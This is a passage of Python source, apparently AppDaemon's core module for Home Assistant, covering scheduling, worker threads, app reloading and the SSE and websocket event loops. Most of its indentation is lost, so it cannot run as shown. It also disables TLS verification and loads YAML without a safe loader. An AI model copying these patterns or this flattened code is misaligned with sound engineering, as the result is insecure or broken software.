)
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_callbacks():
if conf.callbacks == {}:
ha.log(conf.logger, "INFO", "No callbacks")
else:
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Callbacks")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for name in conf.callbacks.keys():
ha.log(conf.logger, "INFO", "{}:".format(name))
for uuid_ in conf.callbacks[name]:
ha.log(conf.logger, "INFO", " {} = {}".format(uuid_, conf.callbacks[name][uuid_]))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_objects():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Objects")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for object_ in conf.objects.keys():
ha.log(conf.logger, "INFO", "{}: {}".format(object_, conf.objects[object_]))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_queue():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Current Queue Size is {}".format(q.qsize()))
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def check_constraint(key, value):
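    # Evaluate a single app-level constraint (constrain_input_boolean, constrain_input_select,
    # constrain_presence or constrain_days) against the current HA state.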
unconstrained = True
with conf.ha_state_lock:
if key == "constrain_input_boolean":
values = value.split(",")
if len(values) == 2:
entity = values[0]
state = values[1]
else:
entity = value
state = "on"
if entity in conf.ha_state and conf.ha_state[entity]["state"] != state:
unconstrained = False
if key == "constrain_input_select":
values = value.split(",")
entity = values.pop(0)
if entity in conf.ha_state and conf.ha_state[entity]["state"] not in values:
unconstrained = False
if key == "constrain_presence":
if value == "everyone" and not ha.everyone_home():
unconstrained = False
elif value == "anyone" and not ha.anyone_home():
unconstrained = False
elif value == "noone" and not ha.noone_home():
unconstrained = False
if key == "constrain_days":
if today_is_constrained(value):
unconstrained = False
return unconstrained
def check_time_constraint(args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if not ha.now_is_between(start_time, end_time, name):
unconstrained = False
return unconstrained
def dispatch_worker(name, args):
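    # Queue the callback for a worker thread only if every app-level and
    # callback-level constraint (including time constraints) is satisfied.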
unconstrained = True
#
# Argument Constraints
#
for arg in config[name].keys():
if not check_constraint(arg, config[name][arg]):
unconstrained = False
if not check_time_constraint(config[name], name):
unconstrained = False
#
# Callback level constraints
#
if "kwargs" in args:
for arg in args["kwargs"].keys():
if not check_constraint(arg, args["kwargs"][arg]):
unconstrained = False
if not check_time_constraint(args["kwargs"], name):
unconstrained = False
if unconstrained:
q.put_nowait(args)
def today_is_constrained(days):
day = ha.get_now().weekday()
daylist = [ha.day_of_week(day) for day in days.split(",")]
if day in daylist:
return False
return True
def process_sun(action):
ha.log(
conf.logger, "DEBUG",
"Process sun: {}, next sunrise: {}, next sunset: {}".format(
action, conf.sun["next_rising"], conf.sun["next_setting"]
)
)
with conf.schedule_lock:
for name in conf.schedule.keys():
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
schedule = conf.schedule[name][entry]
if schedule["type"] == action and "inactive" in schedule:
del schedule["inactive"]
c_offset = ha.get_offset(schedule)
schedule["timestamp"] = ha.calc_sun(action) + c_offset
schedule["offset"] = c_offset
# noinspection PyBroadException
def exec_schedule(name, entry, args):
try:
# Locking performed in calling function
if "inactive" in args:
return
# Call function
if "entity" in args["kwargs"]:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": args["callback"],
"attribute": args["kwargs"]["attribute"],
"entity": args["kwargs"]["entity"],
"new_state": args["kwargs"]["new_state"],
"old_state": args["kwargs"]["old_state"],
"kwargs": args["kwargs"],
})
else:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "timer",
"function": args["callback"],
"kwargs": args["kwargs"],
})
# If it is a repeating entry, rewrite with new timestamp
if args["repeat"]:
if args["type"] == "next_rising" or args["type"] == "next_setting":
                # It's sunrise or sunset - if the offset is negative we
                # won't know the next rise or set time yet, so mark it as inactive
                # so we can adjust it with a scan at sunrise/sunset
if args["offset"] < 0:
args["inactive"] = 1
else:
# We have a valid time for the next sunrise/set so use it
c_offset = ha.get_offset(args)
args["timestamp"] = ha.calc_sun(args["type"]) + c_offset
args["offset"] = c_offset
else:
# Not sunrise or sunset so just increment
# the timestamp with the repeat interval
args["basetime"] += args["interval"]
args["timestamp"] = args["basetime"] + ha.get_offset(args)
else: # Otherwise just delete
del conf.schedule[name][entry]
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(
conf.error, "WARNING",
"Unexpected error during exec_schedule() for App: {}".format(name)
)
ha.log(conf.error, "WARNING", "Args: {}".format(args))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# log messages about writing an error (since they show up anyway)
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
ha.log(conf.error, "WARNING", "Scheduler entry has been deleted")
ha.log(conf.error, "WARNING", '-' * 60)
del conf.schedule[name][entry]
@asyncio.coroutine
def do_every(period, f):
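    # Tick loop: sleep until the next scheduled tick, call f(t), and let f return a
    # corrected timestamp so the loop can recover from clock skew.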
t = math.floor(ha.get_now_ts())
count = 0
#t_ = math.floor(time.time())
while not conf.stopping:
count += 1
#delay = max(t_ + count * period - time.time(), 0)
delay = max(t + period - time.time(), 0)
#print(delay)
yield from asyncio.sleep(delay)
t += conf.interval
r = yield from f(t)
#print(t, r)
if r is not None and r != t:
t = math.floor(r)
# noinspection PyBroadException,PyBroadException
def do_every_second(utc):
global was_dst
global last_state
    # Let's check if we are connected; if not, give up.
if not reading_messages:
return
try:
now = datetime.datetime.fromtimestamp(utc)
conf.now = utc
# If we have reached endtime bail out
if conf.endtime is not None and ha.get_now() >= conf.endtime:
ha.log(conf.logger, "INFO", "End time reached, exiting")
sys.exit(0)
if conf.realtime:
real_now = datetime.datetime.now().timestamp()
delta = abs(utc - real_now)
if delta > 1:
ha.log(conf.logger, "WARNING", "Scheduler clock skew detected - delta = {} - resetting".format(delta))
return real_now
# Update sunrise/sunset etc.
update_sun()
# Check if we have entered or exited DST - if so, reload apps
# to ensure all time callbacks are recalculated
now_dst = is_dst()
if now_dst != was_dst:
ha.log(
conf.logger, "INFO",
"Detected change in DST from {} to {} -"
" reloading all modules".format(was_dst, now_dst)
)
# dump_schedule()
ha.log(conf.logger, "INFO", "-" * 40)
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, read_apps, True)])
#read_apps(True)
# dump_schedule()
was_dst = now_dst
# dump_schedule()
# test code for clock skew
#if random.randint(1, 10) == 5:
# time.sleep(random.randint(1,20))
# Check to see if any apps have changed but only if we have valid state
if last_state is not None:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, read_apps)])
#read_apps()
# Check to see if config has changed
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, check_config)])
#check_config()
        # Call me suspicious, but let's update state from HA periodically
# in case we miss events for whatever reason
# Every 10 minutes seems like a good place to start
if last_state is not None and now - last_state > datetime.timedelta(minutes=10) and conf.ha_url is not None:
try:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, get_ha_state)])
#get_ha_state()
last_state = now
except:
ha.log(conf.logger, "WARNING", "Unexpected error refreshing HA state - retrying in 10 minutes")
# Check on Queue size
qsize = q.qsize()
if qsize > 0 and qsize % 10 == 0:
conf.logger.warning("Queue size is {}, suspect thread starvation".format(q.qsize()))
# Process callbacks
# ha.log(conf.logger, "DEBUG", "Scheduler invoked at {}".format(now))
with conf.schedule_lock:
for name in conf.schedule.keys():
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
if conf.schedule[name][entry]["timestamp"] <= utc:
exec_schedule(name, entry, conf.schedule[name][entry])
else:
break
for k, v in list(conf.schedule.items()):
if v == {}:
del conf.schedule[k]
return utc
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during do_every_second()")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# log messages about writing an error (since they show up anyway)
ha.log(
conf.logger, "WARNING",
"Logged an error to {}".format(conf.errorfile)
)
# noinspection PyBroadException
def worker():
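    # Worker thread: pull dispatched jobs off the queue and invoke the app callback,
    # logging (not raising) any exception and discarding callbacks for stale app objects.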
while True:
args = q.get()
_type = args["type"]
function = args["function"]
_id = args["id"]
name = args["name"]
if name in conf.objects and conf.objects[name]["id"] == _id:
try:
if _type == "initialize":
ha.log(conf.logger, "DEBUG", "Calling initialize() for {}".format(name))
function()
ha.log(conf.logger, "DEBUG", "{} initialize() done".format(name))
elif _type == "timer":
function(ha.sanitize_timer_kwargs(args["kwargs"]))
elif _type == "attr":
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
function(entity, attr, old_state, new_state,
ha.sanitize_state_kwargs(args["kwargs"]))
elif _type == "event":
data = args["data"]
function(args["event"], data, args["kwargs"])
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error in worker for App {}:".format(name))
ha.log(conf.error, "WARNING", "Worker Ags: {}".format(args))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
else:
conf.logger.warning("Found stale callback for {} - discarding".format(name))
if inits.get(name):
inits.pop(name)
q.task_done()
def term_file(name):
global config
for key in config:
if "module" in config[key] and config[key]["module"] == name:
term_object(key)
def clear_file(name):
global config
for key in config:
if "module" in config[key] and config[key]["module"] == name:
clear_object(key)
if key in conf.objects:
del conf.objects[key]
def clear_object(object_):
ha.log(conf.logger, "DEBUG", "Clearing callbacks for {}".format(object_))
with conf.callbacks_lock:
if object_ in conf.callbacks:
del conf.callbacks[object_]
with conf.schedule_lock:
if object_ in conf.schedule:
del conf.schedule[object_]
def term_object(name):
if name in conf.callbacks:
if hasattr(conf.objects[name]["object"], "terminate"):
ha.log(conf.logger, "INFO", "Terminating Object {}".format(name))
# Call terminate directly rather than via worker thread
# so we know terminate has completed before we move on
conf.objects[name]["object"].terminate()
def init_object(name, class_name, module_name, args):
ha.log(conf.logger, "INFO", "Loading Object {} using class {} from module {}".format(name, class_name, module_name))
module = __import__(module_name)
app_class = getattr(module, class_name)
conf.objects[name] = {
"object": app_class(
name, conf.logger, conf.error, args, conf.global_vars
),
"id": uuid.uuid4()
}
    # Call its initialize function
conf.objects[name]["object"].initialize()
# with conf.threads_busy_lock:
# inits[name] = 1
# conf.threads_busy += 1
# q.put_nowait({
# "type": "initialize",
# "name": name,
# "id": conf.objects[name]["id"],
# "function": conf.objects[name]["object"].initialize
# })
def check_and_disapatch(name, function, entity, attribute, new_state,
old_state, cold, cnew, kwargs):
if attribute == "all":
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": function,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"kwargs": kwargs
})
else:
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
if new_state is None:
new = None
else:
            if attribute in new_state:
new = new_state[attribute]
elif attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
if (cold is None or cold == old) and (cnew is None or cnew == new):
if "duration" in kwargs:
# Set a timer
exec_time = ha.get_now_ts() + int(kwargs["duration"])
kwargs["handle"] = ha.insert_schedule(
name, exec_time, function, False, None,
entity=entity,
attribute=attribute,
old_state=old,
new_state=new, **kwargs
)
else:
# Do it now
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "attr",
"function": function,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"kwargs": kwargs
})
else:
if "handle" in kwargs:
# cancel timer
ha.cancel_timer(name, kwargs["handle"])
def process_state_change(data):
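    # Fan a state_changed event out to registered state callbacks, matching on the
    # full entity, the device class only, or all entities.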
entity_id = data['data']['entity_id']
ha.log(conf.logger, "DEBUG", "Entity ID:{}:".format(entity_id))
device, entity = entity_id.split(".")
# Process state callbacks
with conf.callbacks_lock:
for name in conf.callbacks.keys():
for uuid_ in conf.callbacks[name]:
callback = conf.callbacks[name][uuid_]
if callback["type"] == "state":
cdevice = None
centity = None
if callback["entity"] is not None:
if "." not in callback["entity"]:
cdevice = callback["entity"]
centity = None
else:
cdevice, centity = callback["entity"].split(".")
if callback["kwargs"].get("attribute") is None:
cattribute = "state"
else:
cattribute = callback["kwargs"].get("attribute")
cold = callback["kwargs"].get("old")
cnew = callback["kwargs"].get("new")
if cdevice is None:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'],
cold, cnew,
callback["kwargs"]
)
elif centity is None:
if device == cdevice:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'],
cold, cnew,
callback["kwargs"]
)
elif device == cdevice and entity == centity:
check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['data']['new_state'],
data['data']['old_state'], cold,
cnew,
callback["kwargs"]
)
def process_event(data):
with conf.callbacks_lock:
for name in conf.callbacks.keys():
for uuid_ in conf.callbacks[name]:
callback = conf.callbacks[name][uuid_]
if "event" in callback and (
callback["event"] is None
or data['event_type'] == callback["event"]):
# Check any filters
_run = True
for key in callback["kwargs"]:
if key in data["data"] and callback["kwargs"][key] != \
data["data"][key]:
_run = False
if _run:
dispatch_worker(name, {
"name": name,
"id": conf.objects[name]["id"],
"type": "event",
"event": data['event_type'],
"function": callback["function"],
"data": data["data"],
"kwargs": callback["kwargs"]
})
# noinspection PyBroadException
def process_message(data):
try:
ha.log(
conf.logger, "DEBUG",
"Event type:{}:".format(data['event_type'])
)
ha.log(conf.logger, "DEBUG", data["data"])
if data['event_type'] == "state_changed":
entity_id = data['data']['entity_id']
# First update our global state
with conf.ha_state_lock:
conf.ha_state[entity_id] = data['data']['new_state']
if conf.apps is True:
# Process state changed message
if data['event_type'] == "state_changed":
process_state_change(data)
# Process non-state callbacks
process_event(data)
# Update dashboards
if conf.dashboard is True:
appdash.ws_update(data)
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during process_message()")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
# noinspection PyBroadException
def check_config():
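    # Re-read the config file when its mtime changes and reload, add or remove
    # apps whose sections changed.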
global config_file_modified
global config
new_config = None
try:
modified = os.path.getmtime(config_file)
if modified > config_file_modified:
ha.log(conf.logger, "INFO", "{} modified".format(config_file))
config_file_modified = modified
root, ext = os.path.splitext(config_file)
if ext == ".yaml":
with open(config_file, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
new_config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
print(conf.dash, "WARNING", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
ha.log(conf.dash, "WARNING", "parser says")
ha.log(conf.dash, "WARNING", str(exc.problem_mark))
ha.log(conf.dash, "WARNING", str(exc.problem) + " " + str(exc.context))
else:
ha.log(conf.dash, "WARNING", "parser says")
ha.log(conf.dash, "WARNING", str(exc.problem_mark))
ha.log(conf.dash, "WARNING", str(exc.problem))
else:
new_config = configparser.ConfigParser()
new_config.read_file(open(config_file))
if new_config is None:
ha.log(conf.dash, "WARNING", "New config not applied")
return
# Check for changes
for name in config:
if name == "DEFAULT" or name == "AppDaemon":
continue
if name in new_config:
if config[name] != new_config[name]:
# Something changed, clear and reload
ha.log(conf.logger, "INFO", "App '{}' changed - reloading".format(name))
term_object(name)
clear_object(name)
init_object(
name, new_config[name]["class"],
new_config[name]["module"], new_config[name]
)
else:
# Section has been deleted, clear it out
ha.log(conf.logger, "INFO", "App '{}' deleted - removing".format(name))
clear_object(name)
for name in new_config:
if name == "DEFAULT" or name == "AppDaemon":
continue
if name not in config:
#
# New section added!
#
ha.log(conf.logger, "INFO", "App '{}' added - running".format(name))
init_object(
name, new_config[name]["class"],
new_config[name]["module"], new_config[name]
)
config = new_config
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error:")
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
# noinspection PyBroadException
def read_app(file, reload=False):
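    # Import (or reload) a single app module and instantiate every configured
    # app class that it provides.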
global config
name = os.path.basename(file)
module_name = os.path.splitext(name)[0]
# Import the App
try:
if reload:
ha.log(conf.logger, "INFO", "Reloading Module: {}".format(file))
file, ext = os.path.splitext(name)
#
# Clear out callbacks and remove objects
#
term_file(file)
clear_file(file)
#
# Reload
#
try:
importlib.reload(conf.modules[module_name])
except KeyError:
if name not in sys.modules:
# Probably failed to compile on initial load
# so we need to re-import
read_app(file)
else:
# A real KeyError!
raise
else:
ha.log(conf.logger, "INFO", "Loading Module: {}".format(file))
conf.modules[module_name] = importlib.import_module(module_name)
# Instantiate class and Run initialize() function
for name in config:
if name == "DEFAULT" or name == "AppDaemon" or name == "HASS" or name == "HADashboard":
continue
if module_name == config[name]["module"]:
class_name = config[name]["class"]
init_object(name, class_name, module_name, config[name])
except:
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", "Unexpected error during loading of {}:".format(name))
ha.log(conf.error, "WARNING", '-' * 60)
ha.log(conf.error, "WARNING", traceback.format_exc())
ha.log(conf.error, "WARNING", '-' * 60)
if conf.errorfile != "STDERR" and conf.logfile != "STDOUT":
ha.log(conf.logger, "WARNING", "Logged an error to {}".format(conf.errorfile))
def get_module_dependencies(file):
global config
module_name = get_module_from_path(file)
for key in config:
if "module" in config[key] and config[key]["module"] == module_name:
if "dependencies" in config[key]:
return config[key]["dependencies"].split(",")
else:
return None
return None
def in_previous_dependencies(dependencies, load_order):
for dependency in dependencies:
dependency_found = False
for batch in load_order:
for module in batch:
module_name = get_module_from_path(module["name"])
# print(dependency, module_name)
if dependency == module_name:
# print("found {}".format(module_name))
dependency_found = True
if not dependency_found:
return False
return True
def dependencies_are_satisfied(module, load_order):
dependencies = get_module_dependencies(module)
if dependencies is None:
return True
if in_previous_dependencies(dependencies, load_order):
return True
return False
def get_module_from_path(path):
name = os.path.basename(path)
module_name = os.path.splitext(name)[0]
return module_name
def find_dependent_modules(module):
global config
module_name = get_module_from_path(module["name"])
dependents = []
for mod in config:
if "dependencies" in config[mod]:
for dep in config[mod]["dependencies"].split(","):
if dep == module_name:
dependents.append(config[mod]["module"])
return dependents
def get_file_from_module(module):
for file in conf.monitored_files:
module_name = get_module_from_path(file)
if module_name == module:
return file
return None
def file_in_modules(file, modules):
for mod in modules:
if mod["name"] == file:
return True
return False
# noinspection PyBroadException
def read_apps(all_=False):
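    # Scan conf.app_dir for new or modified .py files, pull in dependent modules,
    # and (re)load them in dependency order.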
global config
found_files = []
modules = []
for root, subdirs, files in os.walk(conf.app_dir):
if root[-11:] != "__pycache__":
for file in files:
if file[-3:] == ".py":
found_files.append(os.path.join(root, file))
for file in found_files:
if file == os.path.join(conf.app_dir, "__init__.py"):
continue
if file == os.path.join(conf.app_dir, "__pycache__"):
continue
modified = os.path.getmtime(file)
if file in conf.monitored_files:
if conf.monitored_files[file] < modified or all_:
# read_app(file, True)
module = {"name": file, "reload": True, "load": True}
modules.append(module)
conf.monitored_files[file] = modified
else:
# read_app(file)
modules.append({"name": file, "reload": False, "load": True})
conf.monitored_files[file] = modified
# Add any required dependent files to the list
if modules:
more_modules = True
while more_modules:
module_list = modules.copy()
for module in module_list:
dependent_modules = find_dependent_modules(module)
if not dependent_modules:
more_modules = False
else:
for mod in dependent_modules:
file = get_file_from_module(mod)
if file is None:
ha.log(conf.logger, "ERROR", "Unable to resolve dependencies due to incorrect references")
ha.log(conf.logger, "ERROR", "The following modules have unresolved dependencies:")
ha.log(conf.logger, "ERROR", get_module_from_path(module["file"]))
raise ValueError("Unresolved dependencies")
mod_def = {"name": file, "reload": True, "load": True}
if not file_in_modules(file, modules):
# print("Appending {} ({})".format(mod, file))
modules.append(mod_def)
# Loading order algorithm requires full population of modules
# so we will add in any missing modules but mark them for not loading
for file in conf.monitored_files:
if not file_in_modules(file, modules):
modules.append({"name": file, "reload": False, "load": False})
# Figure out loading order
# for mod in modules:
# print(mod["name"], mod["load"])
load_order = []
while modules:
batch = []
module_list = modules.copy()
for module in module_list:
# print(module)
if dependencies_are_satisfied(module["name"], load_order):
batch.append(module)
modules.remove(module)
if not batch:
ha.log(conf.logger, "ERROR", "Unable to resolve dependencies due to incorrect or circular references")
ha.log(conf.logger, "ERROR", "The following modules have unresolved dependencies:")
for module in modules:
module_name = get_module_from_path(module["name"])
ha.log(conf.logger, "ERROR", module_name)
raise ValueError("Unresolved dependencies")
load_order.append(batch)
try:
for batch in load_order:
for module in batch:
if module["load"]:
read_app(module["name"], module["reload"])
except:
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error loading file")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
def get_ha_state():
ha.log(conf.logger, "DEBUG", "Refreshing HA state")
states = ha.get_ha_state()
with conf.ha_state_lock:
for state in states:
conf.ha_state[state["entity_id"]] = state
# noinspection PyBroadException,PyBroadException
def run():
global was_dst
global last_state
global reading_messages
conf.appq = asyncio.Queue(maxsize=0)
first_time = True
conf.stopping = False
ha.log(conf.logger, "DEBUG", "Entering run()")
conf.loop = asyncio.get_event_loop()
# Save start time
conf.start_time = datetime.datetime.now()
# Take a note of DST
was_dst = is_dst()
# Setup sun
update_sun()
conf.executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
tasks = []
if conf.apps is True:
ha.log(conf.logger, "DEBUG", "Creating worker threads ...")
# Create Worker Threads
for i in range(conf.threads):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
ha.log(conf.logger, "DEBUG", "Done")
if conf.ha_url is not None:
# Read apps and get HA State before we start the timer thread
ha.log(conf.logger, "DEBUG", "Calling HA for initial state")
while last_state is None:
try:
get_ha_state()
last_state = ha.get_now()
except:
ha.log(
conf.logger, "WARNING",
"Disconnected from Home Assistant, retrying in 5 seconds"
)
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
ha.log(conf.logger, "INFO", "Got initial state")
# Initialize appdaemon loop
        tasks.append(asyncio.ensure_future(appdaemon_loop()))
else:
last_state = ha.get_now()
if conf.apps is True:
# Load apps
ha.log(conf.logger, "DEBUG", "Reading Apps")
read_apps(True)
ha.log(conf.logger, "INFO", "App initialization complete")
# Create timer loop
# First, update "now" for less chance of clock skew error
if conf.realtime:
conf.now = datetime.datetime.now().timestamp()
ha.log(conf.logger, "DEBUG", "Starting timer loop")
        tasks.append(asyncio.ensure_future(do_every(conf.tick, do_every_second)))
        tasks.append(asyncio.ensure_future(appstate_loop()))
reading_messages = True
else:
ha.log(conf.logger, "INFO", "Apps are disabled")
# Initialize Dashboard
if conf.dashboard is True:
ha.log(conf.logger, "INFO", "Starting dashboard")
#tasks.append(appdash.run_dash(conf.loop))
appdash.run_dash(conf.loop)
else:
ha.log(conf.logger, "INFO", "Dashboards are disabled")
conf.loop.run_until_complete(asyncio.wait(tasks))
    while not conf.stopping:
        time.sleep(1)
    ha.log(conf.logger, "INFO", "AppDaemon Exited")
@asyncio.coroutine
def appstate_loop():
while not conf.stopping:
args = yield from conf.appq.get()
process_message(args)
conf.appq.task_done()
@asyncio.coroutine
def appdaemon_loop():
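    # Main HA event loop: connect via SSE (older HA or --commtype SSE) or the websocket
    # API, load apps, then consume events until stopped, reconnecting after 5 seconds on errors.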
first_time = True
global reading_messages
global ws
conf.stopping = False
_id = 0
while not conf.stopping:
_id += 1
try:
if first_time is False:
# Get initial state
get_ha_state()
last_state = ha.get_now()
ha.log(conf.logger, "INFO", "Got initial state")
# Let the timer thread know we are in business,
# and give it time to tick at least once
reading_messages = True
# Load apps
read_apps(True)
ha.log(conf.logger, "INFO", "App initialization complete")
#
# Fire HA_STARTED and APPD_STARTED Events
#
if first_time is True:
process_event({"event_type": "appd_started", "data": {}})
first_time = False
elif conf.ha_url is not None:
process_event({"event_type": "ha_started", "data": {}})
if conf.version < parse_version('0.34') or conf.commtype == "SSE":
#
# Older version of HA - connect using SSEClient
#
if conf.commtype == "SSE":
ha.log(conf.logger, "INFO", "Using SSE")
else:
ha.log(
conf.logger, "INFO",
"Home Assistant version < 0.34.0 - "
"falling back to SSE"
)
headers = {'x-ha-access': conf.ha_key}
if conf.timeout is None:
messages = SSEClient(
"{}/api/stream".format(conf.ha_url),
verify=False, headers=headers, retry=3000
)
ha.log(
conf.logger, "INFO",
"Connected to Home Assistant".format(conf.timeout)
)
else:
messages = SSEClient(
"{}/api/stream".format(conf.ha_url),
verify=False, headers=headers, retry=3000,
timeout=int(conf.timeout)
)
ha.log(
conf.logger, "INFO",
"Connected to Home Assistant with timeout = {}".format(
conf.timeout
)
)
while True:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, messages.__next__)])
msg = list(completed)[0].result()
if msg.data != "ping":
process_message(json.loads(msg.data))
else:
#
# Connect to websocket interface
#
url = conf.ha_url
if url.startswith('https://'):
url = url.replace('https', 'wss', 1)
elif url.startswith('http://'):
url = url.replace('http', 'ws', 1)
sslopt = {}
if conf.certpath:
sslopt['ca_certs'] = conf.certpath
ws = create_connection(
"{}/api/websocket".format(url), sslopt=sslopt
)
result = json.loads(ws.recv())
ha.log(conf.logger, "INFO",
"Connected to Home Assistant {}".format(
result["ha_version"]))
#
# Check if auth required, if so send password
#
if result["type"] == "auth_required":
auth = json.dumps({
"type": "auth",
"api_password": conf.ha_key
})
ws.send(auth)
result = json.loads(ws.recv())
if result["type"] != "auth_ok":
ha.log(conf.logger, "WARNING",
"Error in authentication")
raise ValueError("Error in authentication")
#
# Subscribe to event stream
#
sub = json.dumps({
"id": _id,
"type": "subscribe_events"
})
ws.send(sub)
result = json.loads(ws.recv())
if not (result["id"] == _id and result["type"] == "result" and
result["success"] is True):
ha.log(
conf.logger, "WARNING",
"Unable to subscribe to HA events, id = {}".format(_id)
)
ha.log(conf.logger, "WARNING", result)
raise ValueError("Error subscribing to HA Events")
#
# Loop forever consuming events
#
while not conf.stopping:
completed, pending = yield from asyncio.wait([conf.loop.run_in_executor(conf.executor, ws.recv)])
result = json.loads(list(completed)[0].result())
if not (result["id"] == _id and result["type"] == "event"):
ha.log(
conf.logger, "WARNING",
"Unexpected result from Home Assistant, "
"id = {}".format(_id)
)
ha.log(conf.logger, "WARNING", result)
raise ValueError(
"Unexpected result from Home Assistant"
)
process_message(result["event"])
except:
reading_messages = False
if not conf.stopping:
ha.log(
conf.logger, "WARNING",
"Disconnected from Home Assistant, retrying in 5 seconds"
)
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
ha.log(conf.logger, "INFO", "Disconnecting from Home Assistant")
def find_path(name):
for path in [os.path.join(os.path.expanduser("~"), ".homeassistant"),
os.path.join(os.path.sep, "etc", "appdaemon")]:
_file = os.path.join(path, name)
if os.path.isfile(_file) or os.path.isdir(_file):
return _file
return None
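# Example (illustrative): find_path("appdaemon.yaml") returns
# ~/.homeassistant/appdaemon.yaml if it exists, otherwise
# /etc/appdaemon/appdaemon.yaml, otherwise None.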
# noinspection PyBroadException
def main():
global config
global config_file
global config_file_modified
# import appdaemon.stacktracer
# appdaemon.stacktracer.trace_start("/tmp/trace.html")
# Windows does not support SIGUSR1 or SIGUSR2
if platform.system() != "Windows":
signal.signal(signal.SIGUSR1, handle_sig)
signal.signal(signal.SIGINT, handle_sig)
signal.signal(signal.SIGHUP, handle_sig)
# Get command line args
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", help="full path to config directory", type=str, default=None)
parser.add_argument("-p", "--pidfile", help="full path to PID File", default="/tmp/hapush.pid")
parser.add_argument("-t", "--tick", help="time that a tick in the schedular lasts (seconds)", default=1, type=float)
